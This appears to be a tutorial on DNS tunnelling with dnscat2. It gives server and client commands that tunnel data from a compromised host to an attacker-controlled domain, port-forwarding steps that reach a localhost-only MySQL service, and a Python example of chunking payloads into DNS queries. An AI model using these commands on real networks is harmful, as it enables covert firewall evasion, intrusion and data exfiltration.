DNS Tunneling

In this method the DNS protocol is used to both exfiltrate data from and infiltrate data into a network. The dnscat2 tool is used at both ends: it runs a DNS server on the system the attacker controls and a DNS client on the compromised system, and passes data between the two inside DNS queries and responses. This tool comes in handy in situations where DNS is the only protocol allowed through the firewall that separates the two networks.

The DNS server is started on the system that you have direct control over, using the following command (particle42.com is the domain the tunnel will use),

dnscat2-server particle42.com

Then the dnscat client binary has to be transferred to the compromised system through some other channel, and you must already be able to execute commands on that system to start the client. This is a significant hurdle, since the tool is meant for a scenario in which other protocols and access are unavailable; nevertheless both the binary and the initial command have to be delivered to the compromised system somehow. The following command is then executed on it,

./dnscat --dns=server=<server ip>,port=53 --secret=<secret code displayed at server>

The server= option sends the queries directly to the server's IP address on port 53. If the firewall only permits DNS traffic to the network's own resolver, the tunnel domain has to be delegated to the dnscat2 server with an NS record, and the client is pointed at the domain instead (./dnscat --secret=<secret> particle42.com) so that its queries reach the server through the normal resolver chain.

Once the connection is successful a message indicating it will be displayed in the server terminal. The following commands can then be executed at the server end to reach a service on the compromised system or its network through the DNS tunnel. In this scenario we assume the target system is running a MySQL database that accepts connections only from localhost,

#This command lists the windows (sessions) available
windows
#Attach to a window by the id shown in the list (1 here)
window -i 1
#Forward local port 4455 on the control system through the tunnel to port 3306 on the target
listen 127.0.0.1:4455 127.0.0.1:3306

The last command opens a listening port (4455) on the control system and channels every connection made to it through the tunnel to port 3306 on the target system, so a MySQL client on the control system simply connects to 127.0.0.1:4455. Since MySQL accepts only local connections, 127.0.0.1:3306 is given as the destination: the connection is made by the dnscat client on the target system itself, so it appears local to MySQL.

When a different system on the target's network has to be reached, give that system's IP address and port as the second parameter of the listen command instead of 127.0.0.1:3306. The connection originates from the compromised system, so anything it can reach becomes reachable from the control system.

Command execution and the return of results can be noticeably slow, since every command and all data have to be split into small pieces carried inside DNS queries and responses: a query name is limited to 253 characters in total and 63 characters per label, so even small transfers take many round trips.
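To make that bandwidth limit concrete, the following Python snippet is an added example (it is not dnscat2's code, and it is not dnscat2's wire format, which prepends its own session and sequence fields before hex-encoding). It splits a payload into DNS query names under the tunnel domain while obeying the 63-octet label and 253-character name limits, reassembles it on the other side, and counts how many queries a transfer needs. The domain particle42.com and the hex-label layout are assumptions for illustration.

```python
"""Chunking a payload into DNS query names, as a DNS tunnel client does.

Added example: a simplified scheme (hex data labels under the tunnel domain),
not dnscat2's own packet format, which prepends session and sequence fields.
"""
from __future__ import annotations
import math

MAX_LABEL = 63    # RFC 1035: one label holds at most 63 octets
MAX_NAME = 253    # longest dotted name that fits the 255-octet wire limit
LABEL_CHARS = 62  # hex digits per data label: even, so no byte straddles labels
assert LABEL_CHARS <= MAX_LABEL


def bytes_per_query(domain: str) -> int:
    """Payload bytes that fit in one query name under `domain`."""
    budget = MAX_NAME - len(domain) - 1          # chars left before ".domain"
    labels = (budget + 1) // (LABEL_CHARS + 1)   # n labels cost n*L + (n-1) dots
    if labels == 0:
        raise ValueError("domain too long to carry data")
    return labels * LABEL_CHARS // 2


def encode_chunks(payload: bytes, domain: str) -> list[str]:
    """Split `payload` into names like <hex>.<hex>.<hex>.<domain> (client side)."""
    hexdata = payload.hex()
    per_query = bytes_per_query(domain) * 2      # hex digits per query name
    names = []
    for i in range(0, len(hexdata), per_query):
        chunk = hexdata[i:i + per_query]
        labels = [chunk[j:j + LABEL_CHARS] for j in range(0, len(chunk), LABEL_CHARS)]
        names.append(".".join(labels + [domain]))
    return names


def decode_chunks(names: list[str], domain: str) -> bytes:
    """Reassemble the payload from the query names (server side)."""
    suffix = "." + domain
    hexdata = []
    for name in names:
        if not name.endswith(suffix):
            raise ValueError(f"query not under tunnel domain: {name}")
        hexdata.append(name[:-len(suffix)].replace(".", ""))
    return bytes.fromhex("".join(hexdata))


def queries_needed(nbytes: int, domain: str) -> int:
    """Upstream queries required to move `nbytes` through the tunnel."""
    return math.ceil(nbytes / bytes_per_query(domain))


if __name__ == "__main__":
    domain = "particle42.com"                                 # assumed tunnel domain
    sample = b"SELECT user,host FROM mysql.user;\n" * 8       # constructed payload
    names = encode_chunks(sample, domain)
    assert decode_chunks(names, domain) == sample
    assert all(len(n) <= MAX_NAME for n in names)
    print(f"{len(sample)} bytes -> {len(names)} queries "
          f"({bytes_per_query(domain)} bytes each); "
          f"1 MiB would need {queries_needed(1 << 20, domain)} queries")
```

With a 14-character domain, one query name carries three 62-digit hex labels, i.e. 93 payload bytes, so a 1 MiB transfer costs over eleven thousand DNS round trips in the upstream direction alone; the downstream direction is bounded in the same way by the record type carrying the response, which is why interactive sessions and SQL result sets over the tunnel feel sluggish.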
